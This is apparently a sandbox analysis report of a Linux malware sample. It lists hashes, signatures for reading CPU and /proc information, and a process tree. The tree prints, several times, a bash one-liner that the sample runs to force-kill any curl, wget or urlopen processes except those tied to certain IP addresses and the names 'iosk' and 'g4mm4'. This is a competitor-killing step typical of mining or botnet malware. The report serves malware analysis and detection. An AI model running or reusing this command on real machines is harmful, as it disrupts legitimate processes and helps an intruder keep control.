f13e48658426307d9d1434b50fa0493f566ed1f31d6e88bb4ac2ae12ec31ef1f

Analysis

max time kernel
0s
platform
linux_amd64
resource
ubuntu1804-amd64-en-20211208
submitted
13-06-2022 18:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

19827af3181c12ee7a89cee51f254e2c
Size

2.6MB
MD5

19827af3181c12ee7a89cee51f254e2c
SHA1

7c3016dfdfd536e96ef9a7e1a51de01bc0390772
SHA256

f13e48658426307d9d1434b50fa0493f566ed1f31d6e88bb4ac2ae12ec31ef1f
SHA512

1d5915c8e7b8c24a77b17599bea32645ff5e12b7c37f17f2058199be2bf159eb5433f5193d65fdd8aa3a1eba7c4694921e9a0b1a25eb7ef44b2c8eb16d0f3fe9

Score

6^/10

Malware Config

Signatures

Reads CPU attributes 1 TTPs 12 IoCs

System Information Discovery

T1082

description	ioc	Process
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
/proc/24/stat	/proc/24/stat	ps
/proc/16/status	/proc/16/status	ps
/proc/162/stat	/proc/162/stat	ps
/proc/596/status	/proc/596/status	ps
/proc/157/status	/proc/157/status	ps
/proc/168/status	/proc/168/status	ps
/proc/16/cmdline	/proc/16/cmdline	ps
/proc/614/cmdline	/proc/614/cmdline	ps
/proc/129/stat	/proc/129/stat	ps
/proc/363/status	/proc/363/status	ps
/proc/169/stat	/proc/169/stat	ps
/proc/85/status	/proc/85/status	ps
/proc/576/status	/proc/576/status	ps
/proc/23/stat	/proc/23/stat	ps
/proc/79/cmdline	/proc/79/cmdline	ps
/proc/29/stat	/proc/29/stat	ps
/proc/25/cmdline	/proc/25/cmdline	ps
/proc/286/stat	/proc/286/stat	ps
/proc/332/status	/proc/332/status	ps
/proc/341/cmdline	/proc/341/cmdline	ps
/proc/15/stat	/proc/15/stat	ps
/proc/14/status	/proc/14/status	ps
/proc/341/cmdline	/proc/341/cmdline	ps
/proc/157/cmdline	/proc/157/cmdline	ps
/proc/6/cmdline	/proc/6/cmdline	ps
/proc/418/stat	/proc/418/stat	ps
/proc/161/status	/proc/161/status	ps
/proc/169/status	/proc/169/status	ps
/proc/31/status	/proc/31/status	ps
/proc/82/cmdline	/proc/82/cmdline	ps
/proc/89/cmdline	/proc/89/cmdline	ps
/proc/192/cmdline	/proc/192/cmdline	ps
/proc/9/status	/proc/9/status	ps
/proc/223/cmdline	/proc/223/cmdline	ps
/proc/352/cmdline	/proc/352/cmdline	ps
/proc/155/cmdline	/proc/155/cmdline	ps
/proc/420/stat	/proc/420/stat	ps
/proc/156/status	/proc/156/status	ps
/proc/333/cmdline	/proc/333/cmdline	ps
/proc/11/stat	/proc/11/stat	ps
/proc/4/cmdline	/proc/4/cmdline	ps
/proc/675/cmdline	/proc/675/cmdline	ps
/proc/420/status	/proc/420/status	ps
/proc/162/status	/proc/162/status	ps
/proc/154/status	/proc/154/status	ps
/proc/82/status	/proc/82/status	ps
/proc/meminfo	/proc/meminfo	ps
/proc/meminfo	/proc/meminfo	ps
/proc/12/stat	/proc/12/stat	ps
/proc/163/cmdline	/proc/163/cmdline	ps
/proc/156/status	/proc/156/status	ps
/proc/159/stat	/proc/159/stat	ps
/proc/286/cmdline	/proc/286/cmdline	ps
/proc/98/cmdline	/proc/98/cmdline	ps
/proc/418/stat	/proc/418/stat	ps
/proc/166/cmdline	/proc/166/cmdline	ps
/proc/167/stat	/proc/167/stat	ps
/proc/11/cmdline	/proc/11/cmdline	ps
/proc/416/stat	/proc/416/stat	ps
/proc/157/cmdline	/proc/157/cmdline	ps
/proc/31/stat	/proc/31/stat	ps
/proc/164/status	/proc/164/status	ps
/proc/9/status	/proc/9/status	ps
/proc/4/cmdline	/proc/4/cmdline	ps

./19827af3181c12ee7a89cee51f254e2c
./19827af3181c12ee7a89cee51f254e2c
1⤵
PID:576

/bin/bash
bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
1⤵
PID:581
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:582
- /bin/grep
  grep -v grep
  2⤵
  PID:583
- /bin/grep
  grep -v 202.28.229.174
  2⤵
  PID:584
- /bin/grep
  grep -v 192.157.86
  2⤵
  PID:585
- /bin/grep
  grep -v 192.227.90
  2⤵
  PID:586
- /bin/grep
  grep -v iosk
  2⤵
  PID:587
- /bin/grep
  grep -v g4mm4
  2⤵
  PID:588
- /bin/grep
  grep curl
  2⤵
  PID:589
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:590
- /usr/bin/xargs
  xargs -i kill -9 "{}"
  2⤵
  PID:591
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:592
- /bin/grep
  grep -v grep
  2⤵
  PID:593
- /bin/grep
  grep -v 202.28.229.174
  2⤵
  PID:594
- /bin/grep
  grep -v 192.157.86
  2⤵
  PID:595
- /bin/grep
  grep -v iosk
  2⤵
  PID:600
- /bin/grep
  grep -v g4mm4
  2⤵
  PID:601
- /bin/grep
  grep wget
  2⤵
  PID:602
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:603
- /usr/bin/xargs
  xargs -i kill -9 "{}"
  2⤵
  PID:604
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:605
- /bin/grep
  grep -v 202.28.229.174
  2⤵
  PID:606
- /bin/grep
  grep -v grep
  2⤵
  PID:607
- /bin/grep
  grep -v 192.157.86
  2⤵
  PID:608
- /bin/grep
  grep -v iosk
  2⤵
  PID:609
- /bin/grep
  grep -v g4mm4
  2⤵
  PID:610
- /bin/grep
  grep urlopen
  2⤵
  PID:611
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:612
- /usr/bin/xargs
  xargs -i kill -9 "{}"
  2⤵
  PID:613

/bin/bash
bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
1⤵
PID:614
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:615
- /bin/grep
  grep -v grep
  2⤵
  PID:616
- /bin/grep
  grep -v 202.28.229.174
  2⤵
  PID:617
- /bin/grep
  grep -v 192.157.86
  2⤵
  PID:618
- /bin/grep
  grep -v 192.227.90
  2⤵
  PID:619
- /bin/grep
  grep -v iosk
  2⤵
  PID:620
- /bin/grep
  grep -v g4mm4
  2⤵
  PID:621
- /bin/grep
  grep curl
  2⤵
  PID:622
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:623
- /usr/bin/xargs
  xargs -i kill -9 "{}"
  2⤵
  PID:624
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:625
- /bin/grep
  grep -v grep
  2⤵
  PID:626
- /bin/grep
  grep -v 202.28.229.174
  2⤵
  PID:627
- /bin/grep
  grep -v 192.157.86
  2⤵
  PID:628
- /bin/grep
  grep -v iosk
  2⤵
  PID:629
- /bin/grep
  grep -v g4mm4
  2⤵
  PID:630
- /bin/grep
  grep wget
  2⤵
  PID:631
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:632
- /usr/bin/xargs
  xargs -i kill -9 "{}"
  2⤵
  PID:633
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:634
- /bin/grep
  grep -v 202.28.229.174
  2⤵
  PID:635
- /bin/grep
  grep -v grep
  2⤵
  PID:636
- /bin/grep
  grep -v 192.157.86
  2⤵
  PID:637
- /bin/grep
  grep -v iosk
  2⤵
  PID:638
- /bin/grep
  grep -v g4mm4
  2⤵
  PID:639
- /bin/grep
  grep urlopen
  2⤵
  PID:640
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:641
- /usr/bin/xargs
  xargs -i kill -9 "{}"
  2⤵
  PID:642

/bin/bash
bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
1⤵
PID:643
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:644
- /bin/grep
  grep -v grep
  2⤵
  PID:645
- /bin/grep
  grep -v 202.28.229.174
  2⤵
  PID:646
- /bin/grep
  grep -v 192.157.86
  2⤵
  PID:647
- /bin/grep
  grep -v 192.227.90
  2⤵
  PID:648
- /bin/grep
  grep -v iosk
  2⤵
  PID:649
- /bin/grep
  grep -v g4mm4
  2⤵
  PID:650
- /bin/grep
  grep curl
  2⤵
  PID:651
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:652
- /usr/bin/xargs
  xargs -i kill -9 "{}"
  2⤵
  PID:653
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:654
- /bin/grep
  grep -v grep
  2⤵
  PID:655
- /bin/grep
  grep -v 202.28.229.174
  2⤵
  PID:656
- /bin/grep
  grep -v 192.157.86
  2⤵
  PID:657
- /bin/grep
  grep -v iosk
  2⤵
  PID:658
- /bin/grep
  grep -v g4mm4
  2⤵
  PID:659
- /bin/grep
  grep wget
  2⤵
  PID:660
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:661
- /usr/bin/xargs
  xargs -i kill -9 "{}"
  2⤵
  PID:662
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:663
- /bin/grep
  grep -v 202.28.229.174
  2⤵
  PID:664
- /bin/grep
  grep -v grep
  2⤵
  PID:665
- /bin/grep
  grep -v 192.157.86
  2⤵
  PID:666
- /bin/grep
  grep -v iosk
  2⤵
  PID:667
- /bin/grep
  grep -v g4mm4
  2⤵
  PID:668
- /bin/grep
  grep urlopen
  2⤵
  PID:669
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:670
- /usr/bin/xargs
  xargs -i kill -9 "{}"
  2⤵
  PID:671

/bin/bash
bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
1⤵
PID:672
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:673
- /bin/grep
  grep -v grep
  2⤵
  PID:674
- /bin/grep
  grep -v 202.28.229.174
  2⤵
  PID:675
- /bin/grep
  grep -v 192.157.86
  2⤵
  PID:676
- /bin/grep
  grep -v 192.227.90
  2⤵
  PID:677
- /bin/grep
  grep -v iosk
  2⤵
  PID:678
- /bin/grep
  grep -v g4mm4
  2⤵
  PID:679
- /bin/grep
  grep curl
  2⤵
  PID:680
- /usr/bin/xargs
  xargs -i kill -9 "{}"
  2⤵
  PID:682
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:681
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:683
- /bin/grep
  grep -v grep
  2⤵
  PID:684
- /bin/grep
  grep -v 202.28.229.174
  2⤵
  PID:685
- /bin/grep
  grep -v 192.157.86
  2⤵
  PID:686
- /bin/grep
  grep -v iosk
  2⤵
  PID:687
- /bin/grep
  grep -v g4mm4
  2⤵
  PID:688
- /bin/grep
  grep wget
  2⤵
  PID:689
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:690
- /usr/bin/xargs
  xargs -i kill -9 "{}"
  2⤵
  PID:691
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:692
- /bin/grep
  grep -v 202.28.229.174
  2⤵
  PID:693
- /bin/grep
  grep -v grep
  2⤵
  PID:694
- /bin/grep
  grep -v 192.157.86
  2⤵
  PID:695
- /bin/grep
  grep -v iosk
  2⤵
  PID:696
- /bin/grep
  grep -v g4mm4
  2⤵
  PID:697
- /bin/grep
  grep urlopen
  2⤵
  PID:698
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:699
- /usr/bin/xargs
  xargs -i kill -9 "{}"
  2⤵
  PID:700

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads